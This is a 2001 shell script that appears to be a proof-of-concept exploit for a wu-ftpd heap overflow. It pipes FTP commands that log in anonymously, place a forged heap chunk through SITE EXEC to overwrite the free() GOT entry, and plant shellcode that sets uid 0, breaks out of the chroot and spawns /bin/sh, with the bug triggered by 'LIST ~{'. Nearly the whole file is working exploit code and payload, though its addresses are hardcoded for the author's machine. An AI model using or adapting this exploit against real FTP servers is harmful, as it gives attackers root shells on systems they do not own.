#!/bin/sh
#Program: wu261
#Program by: lockdown (www.lockeddown.net)
#Date: December 6, 2001
#
#This is proof of concept code for the wuftpd hole found by CORE.  This is not
#portable code, I hardcoded my values which will be useless for anyone else.
#For portable proof of concept code check out zen-parses exploit:
#http://crash.ihug.co.nz/~Sneuro/woot-exploit.tar.gz
#
#Thanks: To zen-parse for all the help, I never woudl have figured this out
#without him and to slider for providing me with a box to work on.

sleep 2;
echo -e "USER anonymous\r\n";
#point it to our chunk
echo -e "PASS aaaaaaaaaaaaaaaaaaaaaaaa\x18\xa2\x08\x08\r\n";
#build chunk 0xfffffff0 0xfffffff0 0x0806e064 0x0807fe90
#                                 ^free GOT-12 ^shellcode
echo -e "SITE EXEC \xf0\xff\xff\xff\xff\xff\xff\xf0\xff\xff\xff\xff\xff\xff\xf0\
xff\xff\xff\xff\xff\xff\xf0\xff\xff\xff\xff\xff\xff\xbc\xda\x06\x008\xf0\xf2\x07
\x008\xf0\xff\xff\xff\xff\xff\xff\xf0\xff\xff\xff\xff\xff\xff\xbc\xda\x06\x008\x
f0\xf2\x07\x008\xf0\xff\xff\xff\xff\xff\xff\xf0\xff\xff\xff\xff\xff\xff\xbc\xda\
x06\x008\xf0\xf2\x07\x008\xf0\xff\xff\xff\xff\xff\xff\xf0\xff\xff\xff\xff\xff\xff\xbc\xda\x06\x008\xf0\xf2\x07\x008\r\n";
#zen-parses shellcode
echo -e "    \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x0c\xeb\x0c\x9
0\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x55\x89\xe5\x31\xc
0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\xb0\x2e\xcd\x80\xeb\x41\x5e\xb0\x27\x8d\x5e\x0
5\xb1\xed\xcd\x80\x31\xc9\x31\xc0\xb0\x3d\xcd\x80\xba\x2e\x2e\x2f\xff\xff\x8d\x5
d\x04\xb1\x10\x89\x55\x04\x83\xc5\x03\xe0\xf8\x89\x4d\x04\xb0\x3d\xcd\x80\x89\xf
3\x89\x75\x08\x89\x4d\x0c\xb0\x0b\x8d\x4d\x08\x8d\x55\x0c\xcd\x80\xb0\x01\xcd\x8
0\xe8\xba\xff\xff\xff\xff\xff\xff/bin/sh\x00\r\n";
echo -e "LIST ~{\r\n";
sleep 2;